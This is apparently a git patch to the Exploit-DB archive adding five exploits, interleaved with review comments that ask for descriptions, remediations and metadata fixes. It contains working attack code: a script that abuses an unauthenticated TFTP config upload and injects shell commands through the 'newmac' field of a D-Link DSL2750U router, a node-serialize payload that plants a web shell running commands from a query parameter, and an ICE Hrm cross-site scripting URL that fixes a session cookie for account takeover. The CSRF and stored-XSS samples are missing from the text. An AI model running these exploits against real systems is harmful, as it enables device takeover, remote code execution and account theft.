From eb316547aa45e45757ac5f78794b19c4882b619b Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Sat, 19 Jun 2021 05:01:57 +0000
Subject: [PATCH] DB: 2021-06-19

5 changes to exploits/shellcodes

Dlink DSL2750U - 'Reboot' Command Injection
ICE Hrm 29.0.0.OS - 'Account Takeover' Cross-Site Scripting and Session Fixation
ICE Hrm 29.0.0.OS - 'Account Takeover' Cross-Site Request Forgery (CSRF)
ICE Hrm 29.0.0.OS - 'xml upload' Stored Cross-Site Scripting (XSS)
Node.JS - 'node-serialize' Remote Code Execution (3)
---
 exploits/hardware/remote/50034.txt | 109 +++++++++++++++++++++++++++++
 exploits/nodejs/webapps/50036.js | 23 ++++++
 exploits/php/webapps/50030.txt | 20 ++++++
 exploits/php/webapps/50031.txt | 35 +++++++++
 exploits/php/webapps/50032.xml | 28 ++++++++
 files_exploits.csv | 5 ++
 6 files changed, 220 insertions(+)
 create mode 100644 exploits/hardware/remote/50034.txt
 create mode 100644 exploits/nodejs/webapps/50036.js
 create mode 100644 exploits/php/webapps/50030.txt
 create mode 100644 exploits/php/webapps/50031.txt
 create mode 100644 exploits/php/webapps/50032.xml

diff --git a/exploits/hardware/remote/50034.txt b/exploits/hardware/remote/50034.txt
new file mode 100644
index 000000000..6d23e1bb7
--- /dev/null
+++ b/exploits/hardware/remote/50034.txt
@@ -0,0 +1,109 @@ +# Exploit Title: Dlink DSL2750U - 'Reboot' Command Injection +# Date: 17-06-2021 +# Exploit Author: Mohammed Hadi (HadiMed) +# Vendor Homepage: https://me.dlink.com/consumer +# Software Link: https://dlinkmea.com/index.php/product/details?det=c0lvN0JoeVVhSXh4TVhjTnd1OUpUUT09 Version: ME_1.16 +# Tested on: firmware GAN9.ET235B-B-DL-DSL2750U-R5B028-ME.EN_2T2R* +# https://github.com/HadiMed/firmware-analysis/tree/main/DSL-2750U%20(firmware%20version%201.6) + +### + +#!/bin/bash + +# Exploit by HadiMed + +# Takes advantage of the tftp server that accepts the cfg file blindly +echo -ne "\n" +echo "Exploiting Dlink DSL-2750u version 1.6" +echo -ne "\n\n" + +# Sending the payload +echo -ne "binary\nput cfg.xml\nquit" | tftp 192.168.1.1 +echo -ne "\n" + +echo "File uploaded Successfully" +echo "Waiting for router to restart" + +sleep 180 # approximate time for router to restart + +python3 exploit.py + +### + +import requests + +# HTTP request looks like this +''' +POST /cgi-bin/webproc HTTP/1.1 +Host: 192.168.1.1 +Content-Length: 175 +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +Origin: http://192.168.1.1 +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Referer: http://192.168.1.1/cgi-bin/webproc +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: sessionid=deadbeef; language=en_us; sys_UserName=user; sessionid=634cdf91 +Connection: close + +getpage=html%2Findex.html&errorpage=html%2Fmain.html&var%3Amenu=setup&var%3Apage=wizard&obj-action=auth&%3Ausername=user&%3Apassword=user&%3Aaction=login&%3Asessionid=634cdf91 +''' + +# 1 Getting a session id + +# password and username crafted by me on the cfg.xml file + +username = "pwned" +password= "pwned" + + +# 
acually the client set the sessionid in condition that the password and username are correct + +Cookie="sessionid=deadbeef; language=en_us; sys_UserName=pwned; sessionid=deadbeef" +Contentty="application/x-www-form-urlencoded" +Referer="http://192.168.1.1/cgi-bin/webproc" +Contentlen="175" + +# Sending first request to set our session id +response = requests.post("http://192.168.1.1/cgi-bin/webproc", + headers={"Cookie":Cookie , "Content-Type":Contentty , "Referer":Referer , "Content-Length":Contentlen } +, + data={ "getpage":"html/index.html", + "errorpage":"html/main.html", + "var:menu" : "setup", + "var:page":"wizard", + "obj-action":"auth", + ":username":username, + ":password":password, + ":action":"login", + ":sessionid":"deadbeef" +} + ) + + +Referer = "http://192.168.1.1/cgi-bin/webupg" + +name = "mac" +cmd = "1;sleep${IFS}10;reboot;" + +Contentlen = str(len(name+cmd)+10) + +if response.status_code==302: + print("got sessionid=deadbeef !\n waiting for the reverse shell ...") + +# access cgi-bin/webupg +try : + response = requests.post("http://192.168.1.1/cgi-bin/webupg", + headers={"Cookie":Cookie , "Content-Type":Contentty , "Referer":Referer , "Content-Length":Contentlen } + ,data = {"name":name , "newmac":cmd} , timeout=0.0000000001 + +) + +except requests.exceptions.Timeout : + + print("done router will restart in 20 sec") + +print("Device restarted!") \ No newline at end of file diff --git a/exploits/nodejs/webapps/50036.js b/exploits/nodejs/webapps/50036.js new file mode 100644 index 000000000..ab119c4ba --- /dev/null +++ b/exploits/nodejs/webapps/50036.js 
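Review bot: The header block says what the script does but never names why it works — the two weaknesses it chains (a TFTP service that, per the comment `Takes advantage of the tftp server that accepts the cfg file blindly`, accepts a configuration upload without authentication, and a `newmac` value posted to `/cgi-bin/webupg` that evidently reaches a command interpreter, given the `;`-separated payload) appear nowhere as a description, and no remediation is stated. A `# Description:` line naming both issues plus the vendor-side fix (authenticate configuration upload; validate `newmac` as a MAC address before use) would turn the entry into something a defender can act on, and the same two requests are the observable indicators worth logging on the device side. The file also relies on `cfg.xml` and `exploit.py`, neither of which is in this commit, so a sentence saying what the uploaded configuration changes (the comment only says the `pwned` credentials were set through it) is needed for the advisory to be self-describing. The comment typo `acually` should read `actually`.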
@@ -0,0 +1,23 @@ +# Exploit Title: Node.JS - 'node-serialize' Remote Code Execution (3) +# Date: 17.06.2021 +# Exploit Author: Beren Kuday GORUN +# Vendor Homepage: https://github.com/luin/serialize +# Software Link: https://github.com/luin/serialize +# Version: 0.0.4 +# Tested on: Windows & Ubuntu +# CVE : 2017-5941 + +var serialize = require('node-serialize'); +var payload = { + "webShell" : "_$$ND_FUNC$$_function(){const http = require('http'); const url = require('url'); const ps = require('child_process'); http.createServer(function (req, res) { var queryObject = url.parse(req.url,true).query; var cmd = queryObject['cmd']; try { ps.exec(cmd, function(error, stdout, stderr) { res.end(stdout); }); } catch (error) { return; }}).listen(443); }()" + } +serialize.unserialize(serialize.serialize(payload)) + +/* +# after being exploited + +┌──(root@kali)-[/home/kali] +└─# curl http://10.0.2.4:443?cmd=whoami +nodeadmin + +*/ \ No newline at end of file diff --git a/exploits/php/webapps/50030.txt b/exploits/php/webapps/50030.txt new file mode 100644 index 000000000..1e75e49da --- /dev/null +++ b/exploits/php/webapps/50030.txt 
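Review bot: The `# CVE : 2017-5941` header field should read `# CVE : CVE-2017-5941` so it matches the identifier format used across the database and stays searchable. The demonstration deserializes a payload it has just serialized itself (`serialize.unserialize(serialize.serialize(payload))`), so it proves the sink behaviour — a string carrying the module's `_$$ND_FUNC$$_` marker is turned back into a function and, here, self-invoked — rather than any particular remote input path; a description line stating that the precondition is untrusted data reaching `unserialize()` would make that explicit. For defenders the observable effect of this payload is the Node process opening a listener on port 443 that hands a `cmd` query parameter to `child_process.exec`, which is the indicator to alert on; the remediation is to never deserialize external input with node-serialize.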
@@ -0,0 +1,20 @@ +# Exploit Title: ICE Hrm 29.0.0.OS - 'Account Takeover' Cross-Site Scripting and Session Fixation +# Exploit Author: *Piyush Patil *& Rafal Lykowski +# Vendor Homepage: https://icehrm.com/ +# Version: 29.0.0.OS +# Tested on: Windows 10 and Kali + +#Description +ICE Hrm Version 29.0.0.OS is vulnerable to session fixation and reflected cross site scripting leading to full account takeover. + +#Steps to reproduce the attack: +1-Open 2 different browsers (or one with 2 windows - one of them opened in incognito mode) +2-Log in to the system, +3-Paste this payload into the address bar and load it: +http://localhost:8070/app/?g=admin&n=dashboard&m=21484%27%3bdocument.cookie=%22PHPSESSID=12345;path=/;%22%2f%2f +It simulates victim executing XSS. +4-In the incognito window do not log in but just modify session cookie value to 12345. +5-Navigate to any application url - you will realize that you are authorized. It means that your account was taken over. + +#Video POC: +https://drive.google.com/file/d/1egynTGh0XsETgfu7SJtIPv1GZCs1dJ67/view?usp=sharing \ No newline at end of file diff --git a/exploits/php/webapps/50031.txt b/exploits/php/webapps/50031.txt new file mode 100644 index 000000000..1197d424c --- /dev/null +++ b/exploits/php/webapps/50031.txt @@ -0,0 +1,35 @@ +# Exploit Title: ICE Hrm 29.0.0.OS - 'Account Takeover' Cross-Site Request Forgery (CSRF) +# Exploit Author: *Piyush Patil* & Rafal Lykowski +# Vendor Homepage: https://icehrm.com/ +# Version: 29.0.0.OS +# Tested on: Windows 10 and Kali + +#Description +ICE Hrm Version 29.0.0.OS is vulnerable to CSRF which allows attacker to add new admin account or change the password leading to full account takeover. + +#Steps to reproduce the attack: +1- Login as victim +2- Open the CSRF malicious file which I have attached (csrf_POC.html) + + + + +
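Review bot: The header lacks the `# Date:` line that the other entries in this commit carry and that `files_exploits.csv` records as 2021-06-18; the same omission applies to 50031.txt and 50032.xml. The description should also name the injection point — step 3 shows the `m` parameter of `/app/?g=admin&n=dashboard` apparently reflected unescaped into a script context, which is what allows `document.cookie` to be written — and state the two remediations the chain depends on: output-encode `m`, and regenerate the session identifier at login while refusing to adopt a client-supplied `PHPSESSID` the server never issued (PHP's `session.use_strict_mode` provides the latter). Step 4's `modify session cookie value to 12345` could name the cookie, `PHPSESSID`, for readers who skip step 3.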
+ + + + + + +
+ + + +3- Password is changed (you can also add new admin user) + +Now you can simply takeover the account + +#Video POC: +https://drive.google.com/file/d/1uUciTcFEkQ5P_R37QBswNrVbOPqzngpX/view?usp=sharing \ No newline at end of file diff --git a/exploits/php/webapps/50032.xml b/exploits/php/webapps/50032.xml new file mode 100644 index 000000000..c29e0d8b6 --- /dev/null +++ b/exploits/php/webapps/50032.xml @@ -0,0 +1,28 @@ +# Exploit Title: ICE Hrm 29.0.0.OS - 'xml upload' Stored Cross-Site Scripting (XSS) +# Exploit Author: *Piyush Patil *& Rafal Lykowski +# Vendor Homepage: https://icehrm.com/ +# Version: 29.0.0.OS +# Tested on: Windows 10 and Kali + +#Description +The file upload feature in ICE Hrm Version 29.0.0.OS allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability. + +#Steps to Reproduce the issue: +1- Login to ICE Hrm Admin Panel +2- Click on Employees=>Document Management=> Upload a below xml file + + + + + + + + +3- Visit the upload location of file and XSS will get triggered. + +#Video POC: +https://drive.google.com/file/d/1SnMsIhOJKBq4Pnotgm0nw1Pz7TypPsoQ/view?usp=sharing \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 14dbf1531..872015c5d 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
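Review bot: The body of `csrf_POC.html` does not survive in this rendering of the hunk (only bare `+` markers remain between steps 2 and 3), and the surrounding text never identifies which action the forged request targets or which control is missing, so the entry cannot be assessed without the attachment. A one-sentence description of the affected action (the title implies password change and admin-user creation) and of the absent per-request anti-CSRF check would make the advisory usable on its own, and the remediation — a server-validated synchronizer token on state-changing requests and `SameSite` on the session cookie — is worth stating alongside it. The `#Video POC:` Google Drive link is not a durable reference for an archived advisory. The `# Date:` header is missing here as in 50030.txt.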
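Review bot: The file is stored as `50032.xml` but begins with `#`-prefixed header lines, so it is not a well-formed XML document, and the sample upload that step 2 points to does not survive in this rendering of the hunk; the content reads as an advisory and would be clearer as `.txt` with the sample shown in a delimited section. The description should state the condition that makes the stored payload execute — presumably the uploaded file being served back inline from `Document Management` under a content type the browser treats as active content — because that condition is also the remediation: serve user uploads with `Content-Disposition: attachment` or from a separate origin, restrict accepted upload types, and never render uploaded markup inline. The `# Date:` header is missing here as in 50030.txt and 50031.txt.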
@@ -18509,6 +18509,7 @@ id,file,description,date,author,type,platform,port
 49896,exploits/solaris/remote/49896.py,"Solaris SunSSH 11.0 x86 - libpam Remote Root (2)",2021-05-21,legend,remote,solaris,
 49908,exploits/linux/remote/49908.py,"ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution (2)",2021-05-26,Shellbr3ak,remote,linux,
 49936,exploits/hardware/remote/49936.py,"CHIYU IoT Devices - 'Telnet' Authentication Bypass",2021-06-03,sirpedrotavares,remote,hardware,
+50034,exploits/hardware/remote/50034.txt,"Dlink DSL2750U - 'Reboot' Command Injection",2021-06-18,"Mohammed Hadi",remote,hardware,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
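Review bot: The index date `2021-06-18` on the new 50034 row disagrees with the `# Date: 17-06-2021` header inside `50034.txt`, and the 50036 row in the last hunk of this file has the same mismatch against its `# Date: 17.06.2021`; one side should be corrected so the archive's date field matches the advisory. The `author` column for the three ICE Hrm rows in the following two hunks records only `Piyush Patil` while each file credits `Piyush Patil & Rafal Lykowski`, and the 50036 row spells the author `Beren Kuday GÖRÜN` where the file has `Beren Kuday GORUN` — since the CSV is the searchable index it should carry the same names as the files. The hunk's function is otherwise correct: one row added, counts `-18509,6 +18509,7` consistent.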
@@ -42589,6 +42590,7 @@ id,file,description,date,author,type,platform,port
 46852,exploits/php/webapps/46852.txt,"DeepSound 1.0.4 - SQL Injection",2019-05-16,"Mehmet EMIROGLU",webapps,php,80
 46864,exploits/php/webapps/46864.txt,"Interspire Email Marketer 6.20 - 'surveys_submit.php' Remote Code Execution",2019-05-17,"numan türle",webapps,php,
 46869,exploits/php/webapps/46869.py,"eLabFTW 1.8.5 - Arbitrary File Upload / Remote Code Execution",2019-05-20,liquidsky,webapps,php,
+50030,exploits/php/webapps/50030.txt,"ICE Hrm 29.0.0.OS - 'Account Takeover' Cross-Site Scripting and Session Fixation",2021-06-18,"Piyush Patil",webapps,php,
 46881,exploits/php/webapps/46881.txt,"Moodle Jmol Filter 6.1 - Directory Traversal / Cross-Site Scripting",2019-05-21,"Dionach Ltd",webapps,php,
 46882,exploits/hardware/webapps/46882.txt,"TP-LINK TL-WR840N v5 00000005 - Cross-Site Scripting",2019-05-21,"purnendu ghosh",webapps,hardware,
 46885,exploits/java/webapps/46885.txt,"Oracle CTI Web Service - 'EBS_ASSET_HISTORY_OPERATIONS' XML Entity Injection",2019-05-21,omurugur,webapps,java,
@@ -44180,3 +44182,6 @@ id,file,description,date,author,type,platform,port
 50022,exploits/php/webapps/50022.txt,"Unified Office Total Connect Now 1.0 - 'data' SQL Injection",2021-06-17,"Ajaikumar Nadar",webapps,php,
 50027,exploits/java/webapps/50027.py,"Zoho ManageEngine ServiceDesk Plus MSP 9.4 - User Enumeration",2021-06-17,"Ricardo Ruiz",webapps,java,
 50029,exploits/php/webapps/50029.py,"Online Shopping Portal 3.1 - Remote Code Execution (Unauthenticated)",2021-06-17,Tagoletta,webapps,php,
+50031,exploits/php/webapps/50031.txt,"ICE Hrm 29.0.0.OS - 'Account Takeover' Cross-Site Request Forgery (CSRF)",2021-06-18,"Piyush Patil",webapps,php,
+50032,exploits/php/webapps/50032.xml,"ICE Hrm 29.0.0.OS - 'xml upload' Stored Cross-Site Scripting (XSS)",2021-06-18,"Piyush Patil",webapps,php,
+50036,exploits/nodejs/webapps/50036.js,"Node.JS - 'node-serialize' Remote Code Execution (3)",2021-06-18,"Beren Kuday GÖRÜN",webapps,nodejs,